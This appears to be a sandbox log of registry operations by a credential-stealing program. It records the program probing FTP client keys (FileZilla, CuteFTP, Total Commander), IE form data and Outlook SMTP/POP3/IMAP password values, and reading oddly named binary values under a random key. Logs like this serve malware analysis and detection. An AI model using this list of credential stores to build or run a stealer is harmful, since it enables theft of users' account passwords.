Open Key	HKEY_CURRENT_USER\Software\Ghisler\Windows Commander	-	24	Fn
Open Key	HKEY_CURRENT_USER\Software\Ghisler\Total Commander	-	24	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Ghisler\Windows Commander	-	24	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Ghisler\Total Commander	-	24	Fn
Open Key	HKEY_CURRENT_USER\Software\FileZilla	-	40	Fn
Open Key	HKEY_CURRENT_USER\Software\FileZilla Client	-	3	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\FileZilla	-	3	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\FileZilla Client	-	3	Fn
Open Key	HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar	-	3	Fn
Open Key	HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar	-	3	Fn
Open Key	HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar	-	3	Fn
Open Key	HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar	-	3	Fn
Open Key	HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar	-	3	Fn
Open Key	HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar	-	3	Fn
Open Key	HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 9\QCToolbar	-	3	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\FormData	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	-	3	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player Plugin	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	-	3	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	-	3	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	-	3	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40	-	3	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	-	3	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	-	3	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData	-	3	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	-	3	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 25.0 (x86 en-US)	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	-	3	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VMRayVMTools	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC	-	3	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F03217071FF}	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3c3aafc8-d898-43ec-998f-965ffdae065a}	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{582EA838-9199-3518-A05C-DB09462F68EC}	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{68306422-7C57-373F-8860-D26CE4BA2A15}	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9BE518E6-ECC6-35A9-88E4-87755C07200F}	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B175520C-86A2-35A7-8619-86DC379688B9}	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{e52a6842-b0ac-476e-b48f-378a97a67346}	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{e6e75766-da0f-4ba2-9788-6ea593ce702d}	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{f325f05b-f963-4640-a43b-c8a494cdda0f}	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}	-	2	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	9	Fn
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Omegovna, type = REG_BINARY	2	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, type = REG_BINARY	2	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Omegovna, type = REG_BINARY	2	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, type = REG_BINARY	2	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Omegovna, type = REG_BINARY	4	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, type = REG_BINARY	2	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Omegovna, type = REG_BINARY	4	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Omegovna, type = REG_BINARY	2	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Omegovna, type = REG_BINARY	2	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Omegovna, type = REG_BINARY	2	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, type = REG_BINARY	2	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Omegovna, type = REG_BINARY	2	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Omegovna, type = REG_BINARY	10	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, type = REG_BINARY	2	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, type = REG_BINARY	4	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, type = REG_BINARY	2	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Omegovna, type = REG_BINARY	2	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Omegovna, type = REG_BINARY	4	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, type = REG_BINARY	2	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Omegovna, type = REG_BINARY	2	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Omegovna, type = REG_BINARY	14	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Eteg, type = REG_BINARY	2	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, type = REG_BINARY	2	Fn Data
Read Value	HKEY_CURRENT_USER\Software\Mozilla\Firefox	value_name = PathToExe, type = REG_NONE	3	Fn
Read Value	HKEY_CURRENT_USER\Software\Mozilla\Firefox\Crash Reporter	value_name = PathToExe, type = REG_NONE	6	Fn
Read Value	HKEY_CURRENT_USER\Software\Mozilla\Firefox\TaskBarIDs	value_name = PathToExe, type = REG_NONE	6	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox	value_name = PathToExe, type = REG_NONE	2	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox\TaskBarIDs	value_name = PathToExe, type = REG_NONE	4	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox	value_name = PathToExe, type = REG_NONE	2	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US)	value_name = PathToExe, type = REG_NONE	4	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US)\Main	value_name = PathToExe, data = 0, type = REG_SZ	2	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US)\Main	value_name = PathToExe, data = 67	2	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US)\Uninstall	value_name = PathToExe, type = REG_NONE	4	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0	value_name = PathToExe, type = REG_NONE	2	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0\bin	value_name = PathToExe, data = 0, type = REG_SZ	2	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0\bin	value_name = PathToExe, data = 67	2	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0\extensions	value_name = PathToExe, type = REG_NONE	4	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Account Manager	value_name = Outlook, type = REG_NONE	3	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	value_name = Email, type = REG_NONE	3	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	value_name = SMTP Server, type = REG_NONE	3	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	value_name = POP3 Server, type = REG_NONE	3	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	value_name = IMAP Server, type = REG_NONE	3	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	value_name = SMTP User, type = REG_NONE	3	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	value_name = POP3 User, type = REG_NONE	3	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	value_name = IMAP User, type = REG_NONE	3	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	value_name = SMTP Password, type = REG_NONE	3	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	value_name = POP3 Password, type = REG_NONE	3	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	value_name = IMAP Password, type = REG_NONE	3	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = Email, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = Email, data = 115	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = SMTP Server, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = SMTP Server, data = 104	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = POP3 Server, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = POP3 Server, data = 102	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = IMAP Server, type = REG_NONE	3	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = SMTP User, type = REG_NONE	3	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = POP3 User, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = POP3 User, data = 115	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = IMAP User, type = REG_NONE	3	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = SMTP Password, type = REG_NONE	3	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = POP3 Password, type = REG_NONE	3	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = IMAP Password, type = REG_NONE	3	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	value_name = Email, type = REG_NONE	3	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	value_name = SMTP Server, type = REG_NONE	3	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	value_name = POP3 Server, type = REG_NONE	3	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	value_name = IMAP Server, type = REG_NONE	3	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	value_name = SMTP User, type = REG_NONE	3	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	value_name = POP3 User, type = REG_NONE	3	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	value_name = IMAP User, type = REG_NONE	3	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	value_name = SMTP Password, type = REG_NONE	3	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	value_name = POP3 Password, type = REG_NONE	3	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	value_name = IMAP Password, type = REG_NONE	3	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Windows Mail	value_name = Salt, type = REG_NONE	3	Fn
Read Value	HKEY_CURRENT_USER\Software\Mozilla\Firefox	value_name = PathToExe, type = REG_NONE	3	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox	value_name = PathToExe, type = REG_NONE	2	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox	value_name = PathToExe, type = REG_NONE	2	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0	value_name = PathToExe, type = REG_NONE	2	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	value_name = UninstallString, type = REG_NONE	3	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player Plugin	value_name = UninstallString, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player Plugin	value_name = UninstallString, data = 67	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player Plugin	value_name = DisplayName, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player Plugin	value_name = DisplayName, data = 65	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	value_name = UninstallString, type = REG_NONE	3	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	value_name = UninstallString, type = REG_NONE	3	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	value_name = UninstallString, type = REG_NONE	3	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	value_name = UninstallString, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	value_name = UninstallString, data = 34	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	value_name = DisplayName, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	value_name = DisplayName, data = 71	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40	value_name = UninstallString, type = REG_NONE	3	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	value_name = UninstallString, type = REG_NONE	3	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	value_name = UninstallString, type = REG_NONE	3	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData	value_name = UninstallString, type = REG_NONE	3	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	value_name = UninstallString, type = REG_NONE	3	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 25.0 (x86 en-US)	value_name = UninstallString, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 25.0 (x86 en-US)	value_name = UninstallString, data = 34	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 25.0 (x86 en-US)	value_name = DisplayName, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 25.0 (x86 en-US)	value_name = DisplayName, data = 77	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService	value_name = UninstallString, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService	value_name = UninstallString, data = 34	1	Fn
